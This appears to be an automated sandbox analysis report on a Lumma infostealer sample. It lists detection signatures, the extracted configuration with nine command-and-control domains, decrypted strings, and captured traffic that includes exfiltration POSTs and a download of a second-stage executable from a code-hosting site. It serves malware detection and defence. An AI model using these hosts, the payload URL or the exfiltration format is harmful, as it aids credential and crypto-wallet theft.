Windows Analysis Report
TmmiCE5Ulm.exe

Overview

General Information

Sample name: TmmiCE5Ulm.exe
renamed because original name is a hash value
Original sample name: 39a156657be03cc94d69874b25836b8c.exe
Analysis ID: 1579676
MD5: 39a156657be03cc94d69874b25836b8c
SHA1: c23e004baca2916e986c556974abaab7783bdba7
SHA256: 5bfd8db573ebaf03ceffdbe9a0b94a69574930222253a4de5ad02e2e735c9041
Tags: exeuser-abuse_ch
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

barindex
Source: TmmiCE5Ulm.exe Avira: detected
Source: TmmiCE5Ulm.exe.5600.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "grannyejh.lat", "sustainskelet.lat", "discokeyus.lat", "necklacebudi.lat", "rapeflowwj.lat", "aspecteirs.lat", "sweepyribs.lat", "crosshuaht.lat"], "Build id": "LOGS11--LiveTraffic"}
Source: TmmiCE5Ulm.exe ReversingLabs: Detection: 57%
Source: TmmiCE5Ulm.exe Virustotal: Detection: 69% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: TmmiCE5Ulm.exe Joe Sandbox ML: detected
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: rapeflowwj.lat
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: crosshuaht.lat
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: sustainskelet.lat
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: aspecteirs.lat
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: energyaffai.lat
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: necklacebudi.lat
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: discokeyus.lat
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: grannyejh.lat
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: sweepyribs.lat
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000000.00000003.2066355701.0000000004F70000.00000004.00001000.00020000.00000000.sdmp String decryptor: LOGS11--LiveTraffic
Source: TmmiCE5Ulm.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.5:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 3.5.16.86:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Directory queried: number of queries: 1001

Networking

barindex
Source: Network traffic Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.5:56533 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.5:62063 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:53483 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.5:59507 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.5:56488 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:53300 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.5:57658 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.5:57487 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.5:51972 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49713 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49733 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49716 -> 104.21.66.86:443
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: sweepyribs.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Joe Sandbox View IP Address: 104.21.66.86 104.21.66.86
Source: Joe Sandbox View IP Address: 23.55.153.106 23.55.153.106
Source: Joe Sandbox View IP Address: 185.166.143.49 185.166.143.49
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 23.55.153.106:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49739 -> 185.166.143.49:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49745 -> 3.5.16.86:443
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0UCQVNE1GL0PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12805Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BHAYJ4KONJV7SU6NGEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15083Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I71U69D925SIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20537Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HZ3IPPG7Q7NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1223Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=H8XL4F3YH8PVALUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551287Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 88Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNKAFY4FX&Signature=JhHfBCFLHyX01YjJtloXBFvJXdM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJIMEYCIQDWGRIMb9LXXZfl79VFTq%2FskFvxmioOtofL0dfIDqFZ2gIhAJP8GSyu6qftK4UeqX9cHuX5XOOr967KFLOAaxmwQGOTKrACCM%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2Igx0FWF5ybJCkmhX8pgqhAI4vlZyemYNIdhtILr1PBwGVPbyRawX2P9SOAz2sH4A2MXWbLs4VI9hExZK0Et1K%2FZfcAv2DK2%2F%2F3UbHXRF09xPQgClbYp%2BUS1fkeGjEn1qP%2BWN%2F0mNeOH6WJKEOgO9kxNbGmFR5%2FkdpRFho4uTMfUFiKjlhLrQRw6zkgUAadjCAt42zf2Eg5d4xi8HlEW7deLbE%2FM71ylNr%2FYb3X3TrZqMv1qaJkHPadg%2BUk0sct3PeuuUp0CaqVtex3wqgZbKjEbcNjMQ31Hh7gqXTU6knOY57iFcj%2BPJ5cpn8pXxspPZdFJdCoU3R2oQlF2BkZWmj6nywk6Rq9sTdCADM4SjzSxySMlaGzDBgqS7BjqcAXQQ9opzWNiG8NvY5n4BKs1tDtNnnJkDK9ZBfjAjPIA8iWxzfe9xFtNIbh1RExp6zD%2B7N2NmnwOrDW8mME7nCVE9fi5w6eJ3rXchZXw4BEgi14dReaKJTufHw9TIjvP6fx%2Fjz6IH7b9xdtcTbF%2FIWmng5vjYbTyPUCVFxV5VFqpkIGpa3GEdHu1RK6Fla4M5z4Tr1RQW9xDqc9Tzpg%3D%3D&Expires=1734936649 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNNKAFY4FX&Signature=JhHfBCFLHyX01YjJtloXBFvJXdM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAcaCXVzLWVhc3QtMSJIMEYCIQDWGRIMb9LXXZfl79VFTq%2FskFvxmioOtofL0dfIDqFZ2gIhAJP8GSyu6qftK4UeqX9cHuX5XOOr967KFLOAaxmwQGOTKrACCM%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2Igx0FWF5ybJCkmhX8pgqhAI4vlZyemYNIdhtILr1PBwGVPbyRawX2P9SOAz2sH4A2MXWbLs4VI9hExZK0Et1K%2FZfcAv2DK2%2F%2F3UbHXRF09xPQgClbYp%2BUS1fkeGjEn1qP%2BWN%2F0mNeOH6WJKEOgO9kxNbGmFR5%2FkdpRFho4uTMfUFiKjlhLrQRw6zkgUAadjCAt42zf2Eg5d4xi8HlEW7deLbE%2FM71ylNr%2FYb3X3TrZqMv1qaJkHPadg%2BUk0sct3PeuuUp0CaqVtex3wqgZbKjEbcNjMQ31Hh7gqXTU6knOY57iFcj%2BPJ5cpn8pXxspPZdFJdCoU3R2oQlF2BkZWmj6nywk6Rq9sTdCADM4SjzSxySMlaGzDBgqS7BjqcAXQQ9opzWNiG8NvY5n4BKs1tDtNnnJkDK9ZBfjAjPIA8iWxzfe9xFtNIbh1RExp6zD%2B7N2NmnwOrDW8mME7nCVE9fi5w6eJ3rXchZXw4BEgi14dReaKJTufHw9TIjvP6fx%2Fjz6IH7b9xdtcTbF%2FIWmng5vjYbTyPUCVFxV5VFqpkIGpa3GEdHu1RK6Fla4M5z4Tr1RQW9xDqc9Tzpg%3D%3D&Expires=1734936649 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: bbuseruploads.s3.amazonaws.com
Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001184000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001184000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowere equals www.youtube.com (Youtube)
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=689cfb1813aab72f39f2bc09; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 06:26:23 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: LRPC-3bc2bcf3ed6d7050e4a/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=689cfb1813aab72f39f2bc09; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 06:26:23 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: a/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: d.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
